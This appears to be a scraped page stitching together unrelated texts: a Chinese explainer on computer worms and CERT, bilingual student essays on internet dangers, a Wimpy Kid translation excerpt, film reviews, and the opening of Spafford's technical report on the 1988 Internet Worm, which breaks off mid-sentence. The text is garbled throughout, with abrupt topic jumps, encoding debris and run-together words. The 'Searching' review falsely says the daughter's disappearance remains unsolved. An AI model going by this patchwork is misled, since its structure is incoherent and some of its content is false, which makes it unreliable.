The internet worm incident
计算机蠕虫病毒的英文阅读理解
计算机蠕虫病毒的英文阅读理解
蠕虫病毒(Worm Virus)是一种自我传播的恶意软件,它能够在计算机网络中自动复制和传播。
与其他病毒不同,蠕虫病毒不需要依赖宿主程序或文件,而是独立运作。
它能够利用计算机网络中的漏洞或系统安全缺陷,自动感染其他计算机,并在无需用户干预的情况下传播。
蠕虫病毒通常会利用邮件、即时消息、文件共享等方式传播。
一旦感染了一台计算机,蠕虫病毒会利用该计算机的网络连接,寻找其他易受感染的目标。
它会不断复制自身并传播给其他计算机,形成一个链式传播的网络。
蠕虫病毒的危害性主要体现在以下几个方面:首先,它能够占用大量网络带宽,降低网络速度和性能;其次,它能够删除、修改或篡改计算机上的文件和数据;再次,蠕虫病毒还可能携带其他恶意软件,如间谍软件、广告软件等。
最重要的是,蠕虫病毒的传播速度非常快,能够在短时间内影响大量计算机,造成严重的网络瘫痪。
为了防范蠕虫病毒的攻击,用户应该经常更新系统和软件,及时安装补丁程序,并使用防火墙和安全软件进行防御。
此外,用户在使用电子邮件和即时消息等服务时要谨慎,不要打开来自陌生人或不可信来源的链接和附件。
同时,不要下载不明来源的文件或软件,以及避免在不安全的网络环境下进行敏感信息的传输。
蠕虫病毒是网络安全领域的一个重要问题,不仅需要用户的主动防范,也需要网络服务提供商和安全机构的协助,共同保护网络安全和用户个人信息的安全。
通过网络非法入侵的英语作文
通过网络非法入侵的英语作文Cyber intrusion has become a rampant issue in today's digital age. Individuals and organizations alike are falling victim to malicious cyber attacks, resulting in stolen personal information, financial losses, and damaged reputations. 网络入侵已经成为当今数字时代的猖獗问题。
个人和组织都成为恶意网络攻击的受害者,导致个人信息被盗,财务损失,以及声誉受损。
One of the main challenges of combating cyber intrusion is the difficulty in tracing the perpetrators. With the anonymity provided by the internet, hackers can easily cover their tracks and evade detection by law enforcement agencies. This lack of accountability makes it easier for hackers to carry out their attacks without fear of consequences. 打击网络入侵的主要挑战之一是在追踪肇事者时的困难。
在互联网提供的匿名性下,黑客可以轻松地掩盖自己的踪迹,逃避执法机构的检测。
这种缺乏责任感使得黑客更容易在没有后果的情况下进行攻击。
Moreover, the rapid advancements in technology have made it easier for cyber criminals to exploit vulnerabilities in systems and networks. With the increasing connectivity of devices and the rise of theInternet of Things (IoT), there are more entry points for hackers to infiltrate and wreak havoc. This constant evolution of technology poses a significant challenge for cybersecurity professionals in staying ahead of cyber threats. 此外,技术的快速发展使得网络犯罪分子更容易利用系统和网络中的漏洞。
计算机紧急应急小组的简称是
计算机紧急应急小组的简称是随着网络信息系统在政治、军事、金融、商业、文教等方面发挥越来越大的作用,社会对网络信息系统的依赖也日益增强。
而不断出现的软硬件故障、病毒发作、网络入侵、天灾人祸等安全事件也随之变得非常突出,由于安全事件的突发性、复杂性与专业性,为了有备无患,需要建立计算机安全事件的快速发应机制,“计算机安全应急响应组”应运而生。
网络应急响应与救援就是对国内外发生的有关计算机安全的事件进行实时响应与分析,提出解决方案和应急对策,来保证计算机信息系统和网络免遭破坏。
计算机紧急应急小组的简称是CERT,网络应急响应与救援就是对国内外发生的有关计算机安全的事件进行实时响应与分析,提出解决方案和应急对策来保证计算机信息系统和网络免遭破坏在1988年11月的“Internet worm”事件之后1周,美国国防部(DoD)在Carnegie Mellon大学的软件工程研究所成立了全球最早的计算机应急响应协调中心CERT/CC对计算机安全方面的事件做出反应、采取行动,CERT/CC是目前网络安全方面最权威的组织,提供最新的网络安全漏洞及方案。
现在许多组织都有了CERT/CC,比如中国计算机网络应急处理协调中心、泛欧学术网络组织TERENA 的CERT EuroCERT日本的JPCERT/CC。
目前,由于紧急情况(emergency)词义较为狭窄,许多组织现在都用事件(Incident)来取代它,即计算机事件反应组(Computer Incident Response Team,CIRT),这些组织一般称为IRT、CIRT或CSIRT。
有时响应(response)这个词也用处理(handling)来代替。
由于应急响应组之间不仅存在语言、时区及性质的差异,而且面向不同的用户群体,属于不同的国家或组织,他们之间的交流与合作存在着极大的困难,在这种情况下,1990年11个应急响应安全组织成立了事件响应与安全组论坛(Forum of Incident Response and Security Teams,FIRST,),到2001年底FIRST已经包括全球100多个应急响应安全组织。
英语口语:网虫时代
A: Jim, have you heard that the Internet addiction has been defined as a kind of mental disease?A: 吉姆,你听说网瘾被归为一种精神疾病的那个消息没?B: Really?B: 是真的吗?A: Yes. I read the news on the Internet yesterday.A: 是真的。
我昨天在网上看到的这则消息。
B: But how to know if a person is addicted or not?B: 不过那要如何分辨-个人是否有网瘾呢?A: It says that there are some standards to judge it.A: 是依据一些标准去判断的。
B: You know the Internet has become an indispensable part in our life, especially in this information age. For me, I often use my computer to communicate with my friends, and get sorts of informations from the Internet. How can we do that without Internet?B: 你也知道,互联网已经成为我们生活中不可或缺的一部分,尤其在这个信息时代里,更是如此。
对我来说,我经常在网上与朋友们相互交流沟通,并利用网络获取各种各样的信息。
没有网络,我们怎么办呢?A: That's true. But for the Internet addicts, Internet is everything. He will feel restless and irritable without the Internet. Some networms even risk the loss of their jobs, education or career opportumtles, just because of the Internet games, etc.A: 你说得没错。
午餐吃出虫子的作文
午餐吃出虫子的作文英文回答:The incident of finding a worm in my lunch left me both disgusted and concerned. It raised questions about the cleanliness and safety of the food I was consuming. Initially, I felt a wave of nausea and disgust as Irealized the horrifying discovery. I could not believe that I had unknowingly eaten a worm, and the thought of it crawling around in my food turned my stomach.Beyond the initial disgust, I became concerned about the potential health implications. Worms can carry harmful bacteria and parasites, which can cause a range ofillnesses if ingested. I worried about the possibility of contracting a foodborne illness and the subsequent health consequences.Furthermore, the incident raised questions about the overall food safety practices of the establishment where Ipurchased my lunch. It made me wonder if there were anyother hidden hazards lurking in the food that I was not aware of. The presence of a worm suggested that there might be a lack of proper hygiene or inadequate food storage and handling procedures.中文回答:午饭吃出虫子的经历让我感到既恶心又担忧。
小屁孩日记Volume One P190-200翻译参考中学生适用
after all 毕竟;终究
But Rowley was in his front yard, and he was watching me. So I knew there was no turning back.
我想,好吧,两个人就可以玩这个 游戏。回击罗利最好的办法就是自己也 找一个最好的新朋友。但不幸的是,当 时我唯一想到的人就是弗雷格里。
科林带着他的过夜包,所以我知道 他们要去罗利家过夜。
And I thought, Well, two can play at THAT game. The best way to get back at Rowley was to get a new best friend of my own. But unfortunately, the only person who came to mind right at that moment was Fregley.
chumቤተ መጻሕፍቲ ባይዱup 成为朋友
今晚吃过晚饭,我看见罗利和科林 一起上山,成为好友。
Colin had his overnight bag, so I knew they were going to do a sleepover at Rowley’s.
overnight 晚 上 的 , 只 供 一 夜 的;突然的
在他们回到屋里前,我不想离开。 但事情很快就开始失控了。当我正往窗 外看的时候,弗雷格里打开了我的背包, 把我包里的整袋糖豆都吃了。
Fregley is one of these kids who's not supposed to eat any sugar, so two minutes later, he was bouncing off the walls.
网络谜踪英语作文观后感
网络谜踪英语作文观后感In today's era of information technology, the internet has become an indispensable part of our lives. It connects us to the world, providing access to information, entertainment, and even social interactions. However, as the boundaries of the virtual world blur with the real world, the consequences of our actions online can often have devastating effects on our offline lives. This is the central theme of the movie "Searching," a thriller that explores the complexities of the internet and its impact on families.The movie tells the story of David Kim, a father who is desperately searching for his missing daughter, Margot. When Margot disappears without a trace, David is left with only her laptop, which contains clues to her whereabouts. As he delves deeper into the digital world, David uncovers a secret life that his daughter has been hiding from him, leading him to question everything he thought he knew about her.What makes "Searching" so engaging is its innovative storytelling technique. The entire movie unfolds throughthe computer screens of David's laptop, smartphone, and tablets, giving the audience a first-person perspective of his investigation. This not only adds a layer of realism but also makes the viewer feel more involved and connected to the characters.The movie also raises important questions about the impact of technology on our lives. In today's digital age, it's easy to get lost in the virtual world, disconnected from reality. Margot's disappearance is a tragic reminder of the consequences of this disconnect. Her secret life online, filled with lies and deception, ultimately led to her disappearance, leaving her family to grapple with the pain and guilt of not being able to find her.However, "Searching" is not just a movie about technology and its dangers. It's also a movie about family, love, and the complexity of human relationships. David's relentless search for his daughter is a testament to the power of love and the lengths that parents will go to protect their children. His journey through the digital world not only helps him uncover Margot's secret life butalso forces him to reevaluate his own relationship with his daughter.The movie's ending, while bittersweet, leaves the audience with a lot to think about. While David manages to find closure and peace with the help of his family and friends, the mystery of Margot's disappearance remains unsolved. This ambiguity adds to the movie's emotional impact, leaving the viewer with a sense of unresolved tension and sadness.In conclusion, "Searching" is a movie that deserves recognition for its innovative storytelling, thought-provoking themes, and engaging performances. It successfully captures the complexities of the internet and its impact on our lives, making it a must-watch for anyone interested in technology, family dramas, or thrillers. The movie's powerful message about the importance of staying connected with our loved ones and being mindful of our actions online is one that we should all take to heart.**《网络谜踪》观后感**在信息技术日新月异的今天,互联网已成为我们生活中不可或缺的一部分。
网络真是糟透了英语作文
网络真是糟透了英语作文The Internet is a mess. It's like a chaotic jungle where no rules apply. People can say whatever they want, and there's no filter to stop them. It's a free-for-all, and it's both exhilarating and terrifying.You can find all sorts of information on the Internet. Some of it is true, some of it is false, and some of it is just plain weird. It's like a never-ending game of truth or dare, where you never know what you're going to get. It's a world of conspiracy theories, fake news, and viral videos. It's a world where anything goes, and it's both fascinating and disturbing.But the Internet is also a place where you can connect with people from all over the world. You can make friends with someone on the other side of the globe, and you can learn about different cultures and perspectives. It's like a global village, where everyone is just a click away. It's a place where you can find love, support, and inspiration.It's a place where you can be yourself, or be whoever you want to be.However, the Internet can also be a breeding ground for hate and negativity. People hide behind their screens and say things they would never say in person. They spread hate, bully others, and tear each other down. It's like a toxic wasteland, where kindness and empathy are in short supply.It's a place where trolls thrive, and it's both disheartening and infuriating.The Internet is also a place where your privacy is constantly at risk. Your personal information can be stolen, your online activities can be monitored, and your every move can be tracked. It's like living in a glass house, where there's no escape from prying eyes. It's a worldwhere your secrets are never truly safe, and it's both unsettling and unnerving.But despite all its flaws, the Internet is here to stay. It has revolutionized the way we live, work, and communicate. It has opened up endless possibilities andopportunities. It has given us the power to connect, create, and explore. It's a double-edged sword, and it's both a blessing and a curse.So, love it or hate it, the Internet is a force to be reckoned with. It's a wild, unpredictable, and chaotic place. It's a place where anything can happen, and it'sboth thrilling and terrifying. It's a place where you can find answers, but also get lost. It's a place where you can be heard, but also silenced. It's a place where you can be free, but also trapped. It's a place where you can be yourself, but also someone else. It's a place where reality and fiction blur, and it's both exhilarating and dangerous. Welcome to the Internet, the best and worst thing that ever happened to humanity.。
网虫防止英文作文
网虫防止英文作文Paragraph 1:The internet is a vast and wonderful place, full of information and opportunities. However, it can also be a dangerous place if we're not careful. As a netizen, it's important to take precautions to protect ourselves from online threats.Paragraph 2:One of the most common threats on the internet is phishing. This is when someone tries to trick you into giving them your personal information, such as your passwords or credit card details. To avoid falling victim to phishing, be wary of emails or messages that ask for your personal information, and only enter your details on secure websites.Paragraph 3:Another way to protect yourself online is to use strong and unique passwords. Avoid using the same password for multiple accounts, as this makes it easier for hackers to access all of your accounts if they manage to crack one password. Instead, use a combination of letters, numbers, and symbols to create a strong password that's difficult to guess.Paragraph 4:It's also important to keep your software and devices up to date with the latest security patches. Hackers often exploit vulnerabilities in outdated software to gain access to your device or steal your information. By keeping your software up to date, you can reduce the risk of being hacked.Paragraph 5:Finally, be careful about what you share online. Avoid posting personal information, such as your home address orphone number, on social media or other public forums. Also, be wary of scams or fake websites that ask for your personal information. If something seems too good to be true, it probably is.Conclusion:In conclusion, the internet can be a dangerous place if we're not careful. By taking precautions such as avoiding phishing scams, using strong passwords, keeping software up to date, and being careful about what we share online, we can protect ourselves from online threats and enjoy the benefits of the internet safely.。
互联网蒙蔽人心英语作文
互联网蒙蔽人心英语作文英文回答:The internet, a vast and ever-expanding realm of information and communication, has become an integral part of our lives. Its benefits are undeniable: it has democratized access to knowledge, facilitated communication across vast distances, and revolutionized the way we conduct business and interact with the world. However, alongside these benefits, there are also concerns about the internet's potential to negatively impact our cognitive abilities and our perception of reality.One concern is that the internet's constant bombardment of information and stimuli can lead to a state of chronic distraction and cognitive overload. We are constantly checking our phones, refreshing our social media feeds, and browsing the web, often without truly engaging with any of the content we encounter. This constant distraction can make it difficult to concentrate, impair our memory, andreduce our overall cognitive function.Another concern is that the internet's echo chambersand filter bubbles can lead to confirmation bias and a narrowing of our perspectives. Social media algorithmsoften show us content that aligns with our existing beliefs, and we tend to interact with people who share our views. This can create a false sense of consensus and make it more difficult to consider alternative viewpoints.Furthermore, the internet's anonymity can create asense of disinhibition, leading people to express their thoughts and opinions in ways that they would not in face-to-face interactions. This can lead to the spread of misinformation, hate speech, and other forms of harmful content.It is important to acknowledge that the internet is a tool, and like any tool, it can be used for both good and bad purposes. The key is to use the internet wisely and to be aware of its potential risks. We need to develop strategies for managing our online consumption, avoidingecho chambers, and critically evaluating the information we encounter. We also need to promote digital literacy and education, so that people can understand the internet's workings and make informed choices about how they use it.By addressing these concerns and using the internet responsibly, we can harness its many benefits while mitigating its potential risks. The internet can be a powerful tool for education, communication, and social good, but it is up to us to ensure that it is used in a way that benefits society as a whole.中文回答:互联网,一个浩瀚且不断扩展的信息和交流领域,已成为我们生活中不可或缺的一部分。
网络有很多危险英语作文
网络有很多危险英语作文英文,The internet is a wonderful tool that has revolutionized the way we communicate, work, and access information. However, it also comes with its fair share of dangers. From cyberbullying to identity theft, there are many risks associated with using the internet.One of the most common dangers of the internet is cyberbullying. This is when someone is harassed, threatened, or targeted by others online. It can happen to anyone, regardless of age, and can have serious consequences forthe victim. For example, a friend of mine was cyberbullied on social media, and it had a significant impact on her mental health. She felt isolated and anxious, and it took a long time for her to recover from the experience.Another danger of the internet is the risk of identity theft. This occurs when someone steals your personal information, such as your credit card details or social security number, and uses it for their own gain. I knowsomeone who fell victim to identity theft after unknowingly clicking on a phishing email. It took them months to resolve the issue and regain control of their accounts.中文,网络是一个很好的工具,改变了我们的沟通方式、工作方式和获取信息的方式。
互联网不能忽视的阴暗面英语作文
互联网不能忽视的阴暗面英语作文Well, you know, the internet has its downsides too, you can't just ignore that. It's like a double-edged sword. Sometimes, you find yourself scrolling through social media and all you see is negativity and hate. People can hide behind their screens and say whatever they want, without thinking about the impact.Cyberbullying is a big problem too. It's easy to make fun of someone online or spread rumors about them, but the emotional damage can be really serious. Sometimes, kids and even adults struggle with this for years.Plus, the internet is a breeding ground for fake news and misinformation. It's hard to know what's true andwhat's not. People can spread rumors and lies without any consequences. And it can have a real impact on society,like influencing elections or causing panic.Another thing is that the internet can be a distraction.You can easily get lost in a rabbit hole of videos or articles and waste hours of your time. And it's not just kids, adults do it too. Sometimes, we forget to look up from our screens and enjoy the real world around us.So yeah, the internet is amazing, but it's not all sunshine and rainbows. We need to be aware of its dark side and take steps to protect ourselves and others from its negative impacts.。
互联网侵略我们私生活的英语作文
互联网侵略我们私生活的英语作文The internet has become such a big part of our lives that it's hard to imagine a day without it. But sometimes, I feel like it's invading my privacy. Like, you know, when I'm scrolling through social media, I feel like everyone's watching me. Those targeted ads are always popping up, showing me stuff I was just thinking about. It's likethey're listening in on my conversations or something.Another thing is, my phone's always pinging with notifications. It's like my life is being dictated by these alerts. I'm not sure if it's the apps or my friends, but they're always demanding my attention. Sometimes, I just wanna be left alone, but the internet won't let me.And then there's this whole issue of data collection. Companies are always collecting our information, from our search history to our shopping habits. It feels like they know more about me than I know about myself. I don't know if it's for advertising or something worse, but it'sdefinitely creeping me out.I try to be careful about what I share online, but it's hard. You never know who's gonna take that picture or post and use it against you. I've seen people get into trouble because of something they said on social media, and it's just not fair. We should have the right to privacy, but the internet makes that harder.。
互联网的潜在危险英语作文120~180字
互联网的潜在危险英语作文1The Internet, undoubtedly, has brought numerous benefits and conveniences to our lives. However, we must not overlook the potential dangers it poses. One of the most significant risks is online fraud. For instance, there was a case where an individual believed the false information about winning a lottery online and ended up suffering a huge financial loss. This clearly shows how deceptive and harmful the Internet can be.Another serious problem is the leakage of personal information. Many people have unknowingly exposed their private details on the Internet, which can be exploited by criminals for various illegal activities. Some celebrities, too, have faced great distress when their personal privacy was exposed online, causing significant disruptions to their lives and careers.Cyber violence is yet another major concern. People often hide behind anonymity to launch hurtful and offensive attacks on others, causing psychological harm and trauma. This not only violates moral and ethical norms but also undermines the harmony and civility of online communities.In conclusion, while we enjoy the advantages of the Internet, we should also be vigilant and take necessary precautions to avoid falling victim to its potential dangers. We need to enhance our awareness of onlinesecurity and protect our personal information to ensure a safe and beneficial online experience.2The Internet, undoubtedly a revolutionary invention that has transformed the way we live and communicate, also poses significant potential dangers, especially to the physical and mental health of teenagers.Excessive indulgence in online games is a prominent issue. Take, for instance, a classmate of mine who was once an excellent student but gradually became addicted to online games. As a result, his academic performance deteriorated sharply. His grades plummeted, and he lost interest in studying. Moreover, spending long hours in front of the computer screen has adverse effects on eyesight.Another concern is the exposure to inappropriate information. The Internet is a vast repository of all kinds of content, including some that may negatively influence the formation of values among teenagers. Some adolescents, influenced by bad online content, have even strayed onto the path of crime.In conclusion, while the Internet offers numerous benefits, we must not overlook its potential threats to the younger generation. Parents and educators should guide teenagers to use the Internet properly and consciously, fostering a healthy online environment for their growth. Only in this way can teenagers fully utilize the advantages of the Internet whileavoiding its pitfalls.3The Internet, a revolutionary invention that has transformed our lives in countless ways, also brings along some potential dangers, especially to our social skills. In today's digital age, people are increasingly relying on online social interactions, often at the expense of real-life communication. This excessive dependence has led to a gradual estrangement in interpersonal relationships.Take family gatherings for instance. Instead of engaging in lively conversations and sharing stories face to face, everyone is buried in their phones, scrolling through social media or playing games. The warm atmosphere of family reunions has been replaced by a cold silence, as people are more focused on the virtual world than the people sitting right beside them.Another common scenario is among friends. Online, they chat constantly, sharing every detail of their lives. But when they meet in person, the conversation seems to dry up. They have become so accustomed to communicating through screens that they struggle to have a meaningful exchange in the real world.The Internet is undoubtedly a powerful tool, but we must be cautious not to let it erode our ability to connect with others in a genuine and heartfelt way. We should strike a balance between the convenience of thedigital realm and the importance of real-life human interaction, for it is these face-to-face connections that truly nourish our souls and strengthen the bonds of our relationships.4The Internet has undoubtedly brought about numerous benefits and conveniences to our lives. However, we must also be aware of its potential dangers, particularly in terms of the authenticity of information.False news spreads rapidly on the Internet, misleading the public and causing chaos. For instance, during a major disaster, a rumor that rescue efforts were insufficient spread like wildfire. This not only caused panic among the affected people but also hindered the smooth progress of rescue work.Another example is the dissemination of false health and wellness information. People often come across various health tips online, such as "drinking a certain juice can cure cancer". Such misinformation can lead individuals to make incorrect decisions regarding their health, with potentially serious consequences.The root cause of these problems lies in the ease and speed with which information can be shared on the Internet. Anyone can post and spread information, regardless of its accuracy. This lack of verification and regulation poses a significant threat to the reliability of the information we receive.In conclusion, while we enjoy the advantages of the Internet, we should also be vigilant and discerning when consuming information. We need to develop the ability to critically evaluate the sources and authenticity of the information to avoid being misled by false or inaccurate content.5The Internet, undoubtedly a revolutionary force in the modern world, has brought about numerous benefits and conveniences. However, from an economic perspective, it also harbors potential dangers that cannot be ignored.One of the significant threats is the occurrence of cyber attacks. Take the well-known company XYZ for instance. It suffered a severe cyber attack that disrupted its entire business operation, causing colossal financial losses. Such incidents not only affect the immediate financial situation of the enterprise but also damage its reputation and customer trust, leading to long-term negative impacts on its market position.Another aspect is the unfair competition in e-commerce platforms. Some e-commerce giants might employ underhanded tactics to suppress their competitors. They might manipulate search rankings, offer artificially low prices temporarily to drive rivals out of business, or engage in false advertising to mislead consumers. This not only disturbs the normal market order but also hinders the healthy development of small and medium-sizedenterprises, thereby limiting innovation and diversity in the market.In conclusion, while the Internet has greatly facilitated economic development, we must be vigilant about its potential dangers. It is essential for businesses and governments to strengthen security measures and enforce strict regulations to ensure a fair and secure online business environment. Only in this way can we fully harness the benefits of the Internet while minimizing its adverse effects.。
网络谜踪英语作文观后感
网络谜踪英语作文观后感A Reflection on the Film":The digital age has ushered in a new era of connectivity, where the virtual world has become an integral part of our daily lives. With the advent of the internet and social media, we find ourselves immersed in a realm of endless possibilities, where information and communication flow at an unprecedented pace. However, this digital landscape has also given rise to a new breed of challenges, one that explores the intricate web of online anonymity and the pursuit of hidden truths. "Exploring the Online Enigma: A Reflection on the Film" delves into the complexities of this digital landscape, offering a thought-provoking examination of the profound impact it has on our lives.The film opens with a captivating premise, introducing us to a world where the lines between reality and the virtual realm blur. We are immediately drawn into the story of a young investigative journalist, driven by a relentless pursuit of the truth, who stumbles upon a mysterious online trail that leads her down a rabbit hole of intrigue and deception. As she navigates the treacherous waters of the internet, we are confronted with the unsettling realization that thedigital world is not the safe haven we often assume it to be.One of the film's most compelling aspects is its exploration of the concept of online anonymity. In a world where anyone can create a digital persona, the film masterfully highlights the potential for abuse and the challenges it poses to traditional investigative methods. The protagonist's journey is marked by a constant struggle to unravel the layers of deception, as she grapples with the elusive nature of her online targets. This theme resonates deeply with the audience, as we are forced to confront the unsettling reality that the digital world can provide a cloak of invisibility for those who seek to manipulate and exploit.The film's portrayal of the impact of the digital age on personal relationships is equally captivating. As the protagonist delves deeper into the online mystery, she is forced to confront the consequences of her own digital footprint and the impact it has on her personal and professional life. The film poignantly explores the delicate balance between the need for privacy and the desire for transparency, as the protagonist navigates the complex web of online interactions and the impact they have on her relationships.One of the most striking aspects of the film is its ability to capture the relentless pace of the digital world. The rapid succession of events, the constant flow of information, and the ever-changinglandscape of the internet are seamlessly woven into the narrative, creating a sense of urgency and tension that keeps the audience on the edge of their seats. This cinematic technique not only reflects the frantic nature of the digital age but also serves to heighten the sense of unease and uncertainty that permeates the film.The film's exploration of the ethical implications of the digital age is another standout feature. As the protagonist delves deeper into the online mystery, she is forced to confront the moral dilemmas that arise from the use of technology. The film presents a nuanced and balanced perspective, acknowledging the potential benefits of the digital world while also highlighting the dangers and ethical pitfalls that come with its misuse. This approach encourages the audience to engage in critical thinking and to consider the broader implications of the digital age on our society.Perhaps one of the most compelling aspects of the film is its ability to blur the lines between the virtual and the real. The seamless integration of online interactions, digital evidence, and physical reality creates a sense of unease and uncertainty, challenging the audience to question the very nature of truth and reality in the digital age. This blurring of boundaries serves to heighten the sense of mystery and intrigue, as the audience is left to grapple with the unsettling realization that the digital world may not be as straightforward as it appears.In conclusion, "Exploring the Online Enigma: A Reflection on the Film" is a powerful and thought-provoking exploration of the complexities of the digital age. Through its masterful storytelling, compelling characters, and thought-provoking themes, the film encourages the audience to engage in a deeper examination of the impact of technology on our lives. As we continue to navigate the ever-evolving digital landscape, this film serves as a timely and relevant reminder of the importance of critical thinking, ethical consideration, and a nuanced understanding of the virtual world that has become so deeply intertwined with our reality.。
互联网是一个危险的地方英语作文
互联网是一个危险的地方英语作文The internet has become an integral part of our daily lives. It has transformed the way we work, communicate, and access information. However, with the numerous benefitsthat the internet offers, it also poses a significantthreat to its users. The internet is a dangerous place, and users need to be cautious while using it.One of the biggest dangers of the internet is cybercrime. Cybercriminals use various tactics to steal personal information, such as identity theft, phishing scams, and malware attacks. They can gain access to your personal information, including your bank account details, social security numbers, and credit card information. This canlead to financial loss and damage to your credit score.Another danger of the internet is online harassment. Social media platforms have provided individuals with a platform to express their opinions, but they have also become a breeding ground for cyberbullying. Cyberbullying can cause emotional distress, anxiety, and depression. It can also lead to social isolation and, in extreme cases, suicide.The internet is also a source of fake news and misinformation. With the rise of social media, it has become easy for individuals and organizations to spread false information to a large audience. This can have serious consequences, especially in sensitive areas such as politics and health. Fake news can cause public panic, create social unrest, and even cause harm to individuals' health.The internet has also contributed to the rise of addiction, especially among young people. Social media, online gaming, and gambling are some of the activities that can lead to addiction. Addiction can have adverse effects on an individual's mental and physical health, leading to social and financial problems.Moreover, the internet has made it easy for individuals to engage in illegal activities such as drug trafficking, human trafficking, and terrorism. Criminals can use the anonymity provided by the internet to carry out theirillegal activities, making it difficult for law enforcement agencies to track them.In conclusion, the internet is a dangerous place, and users need to take precautions while using it. Cybercrime, online harassment, fake news, addiction, and illegal activities are some of the dangers associated with the internet. It is essential to be aware of these dangers and take necessary steps to protect oneself while using the internet. Users should use strong passwords, avoid sharing personal information online, and be cautious of suspicious emails and links. They should also limit their time online and seek help if they feel addicted. By being cautious and responsible, we can ensure that we can use the internet safely.。
网络乱象的英语作文
网络乱象的英语作文In the wild west of the internet, chaos reigns supreme. Scams lurk behind every click, waiting to pounce on unsuspecting victims. From phishing emails promising untold riches to fake social media profiles peddling dubious products, the digital landscape is a minefield of deception.Trolls roam freely in the virtual realm, spreading hate and discord with every keystroke. From toxic comment sections to heated online debates, civility is often a casualty in the battle for internet dominance.Catfishing, the art of luring someone into arelationship using a fictional online persona, preys on the vulnerable and the lonely. Behind the facade of a charming profile lies deceit and manipulation, leaving hearts broken and trust shattered.The rise of fake news has muddied the waters of public discourse, blurring the lines between fact and fiction.With sensational headlines designed to provoke outrage and clicks, the truth becomes a casualty in the quest for virality.Cyberbullying casts a dark shadow over the digital landscape, leaving scars that may never heal. From hurtful comments to malicious gossip, the anonymity of the internet emboldens bullies to torment their victims without fear of consequence.Privacy is a rare commodity in the age of social media oversharing. Every post, like, and share becomes fodder for advertisers and data brokers, leaving individuals exposed to exploitation and manipulation.In the vast expanse of the internet, misinformation spreads like wildfire, fueled by the echo chambers ofsocial media. From conspiracy theories to pseudoscience, the line between reality and fantasy blurs as falsehoods gain traction in the digital echo chamber.Online addiction grips many in its ironclad grasp,trapping them in a never-ending cycle of scrolling and clicking. From gaming binges to endless hours spent on social media, the virtual world becomes a refuge from the harsh realities of life.In the digital wild west, vigilantes and outlaws alike roam the virtual frontier, each carving out their own slice of cyberspace. From hacktivist groups fighting for justice to cybercriminals lurking in the shadows, the internet is a battleground where the line between good and evil is often blurred.In the end, the internet remains a reflection of humanity itself – a complex tapestry of light and shadow, where the best and worst of human nature are on full display for all to see.。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
The Internet Worm IncidentTechnical Report CSD-TR-933*Eugene H.SpaffordDepartment of Computer SciencesPurdue UniversityWest Lafayette,IN USA47907-2004spaf@On the evening of2November1988,someone‘‘infected’’the Internet with a worm program.That program exploitedflaws in utility programs in systems based on BSD-derived versions of U NIX.Theflaws allowed the program to break into those machines and copy itself,thus infecting those systems.This program eventually spread to thousands of machines,and disrupted normal activities and Internet connectivity for many days.This paper explains why this program was a worm(as opposed to a virus),and provides a brief chronology of both the spread and eradication of the program.That is followed by discussion of some specific issues raised by the community’s reaction and subsequent discussion of the event.Included are some interesting lessons learned from the incident.September19,1991The Internet Worm IncidentTechnical Report CSD-TR-933*Eugene H.SpaffordDepartment of Computer SciencesPurdue UniversityWest Lafayette,IN USA47907-2004spaf@1.IntroductionWorldwide,over60,000computers†in interconnecting networks communicate using a common set of protocols—the Internet Protocols(IP).[7,15]On the evening of2November1988this network(the Internet)came under attack from within.Sometime after5PM EST,a program was executed on one or more of these hosts.That program collected host,network,and user information,then used that informa-tion to establish network connections and break into other machines usingflaws present in those systems’software.After breaking in,the program would replicate itself and the replica would attempt to infect other systems in the same manner.Although the program would only infect Sun Microsystems Sun3 systems,and V AX™computers running variants of4BSD‡U NIX,®the program spread quickly,as did the confusion and consternation of system administrators and users as they discovered that their systems had been invaded.Although U NIX has long been known to have some security weaknesses(cf.[22], [13,21,29]),especially in its usual mode of operation in open research environments,the scope of the break-ins nonetheless came as a great surprise to almost everyone.The program was mysterious to users at sites where it appeared.Unusualfiles were left in the scratch(/usr/tmp)directories of some machines,and strange messages appeared in the logfiles of some of the utilities,such as the sendmail mail handling agent.The most noticeable effect,however,was that sys-tems became more and more loaded with running processes as they became repeatedly infected.As time went on,some of these machines became so loaded that they were unable to continue any processing; some machines failed completely when their swap space or process tables were exhausted.By early Thursday morning,November3,personnel at the University of California at Berkeley and Massachusetts Institute of Technology had‘‘captured’’copies of the program and began to analyze it. People at other sites also began to study the program and were developing methods of eradicating it.A common fear was that the program was somehow tampering with system resources in a way that could not be readily detected—that while a cure was being sought,systemfiles were being altered or informa-tion destroyed.By5AM EST Thursday morning,less than12hours after the program wasfirst discovered on the network,the Computer Systems Research Group at Berkeley had developed an interim set of steps to halt its spread.This included a preliminary patch to the sendmail mail agent,and the suggestion to rename one or both of the C compiler and loader to prevent their use.These suggestions were published in mailing lists and on the Usenet network news system,although their spread was*This paper appears in the Proceedings of the1989European Software Engineering Conference(ESEC89),pub-lished by Springer-Verlag as#87in the‘‘Lecture Notes in Computer Science’’series.†As presented by Mark Lottor at the October1988Internet Engineering Task Force(IETF)meeting in Ann Arbor,MI.‡BSD is an acronym for Berkeley Software Distribution.®U NIX is a registered trademark of AT&T Laboratories.™V AX is a trademark of Digital Equipment Corporation.hampered by systems disconnected from the Internet in an attempt to‘‘quarantine’’them.By about9PM EST Thursday,another simple,effective method of stopping the invading program, without altering system utilities,was discovered at Purdue and also widely published.Software patches were posted by the Berkeley group at the same time to mend all theflaws that enabled the program to invade systems.All that remained was to analyze the code that caused the problems and discover who had unleashed the worm—and why.In the weeks that followed,other well-publicized computer break-ins occurred and many debates began about how to deal with the individuals staging these break-ins,who is responsible for security and software updates,and the future roles of networks and security.The conclu-sion of these discussions may be some time in coming because of the complexity of the topics,but the ongoing debate should be of interest to computer professionals everywhere.A few of those issues are summarized later.After a brief discussion of why the November2nd program has been called a worm,this paper describes how the program worked.This is followed by a chronology of the spread and eradication of the Worm,and concludes with some observations and remarks about the community’s reaction to the whole incident,as well as some remarks about potential consequences for the author of the Worm.2.TerminologyThere seems to be considerable variation in the names applied to the program described here. Many people have used the term worm instead of virus based on its behavior.Members of the press have used the term virus,possibly because their experience to date has been only with that form of security problem.This usage has been reinforced by quotes from computer managers and programmers also unfamiliar with the difference.For purposes of clarifying the terminology,let me define the difference between these two terms and give some citations as to their origins;these same definitions were recently given in[9]:A worm is a program that can run independently and can 